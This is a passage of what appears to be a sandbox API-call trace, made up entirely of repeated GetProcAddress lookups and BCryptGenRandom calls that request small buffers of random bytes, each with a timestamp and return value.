pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02093, cbBuffer=0x22, dwFlags=0x2 | out: pbBuffer=0x3a02093) returned 0x0 [0229.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.117] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020b5, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a020b5) returned 0x0 [0229.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.122] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.122] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.123] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.124] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.125] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.457] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0229.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0229.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0229.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0229.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0229.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020e5, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a020e5) returned 0x0 [0229.463] GetProcAddress 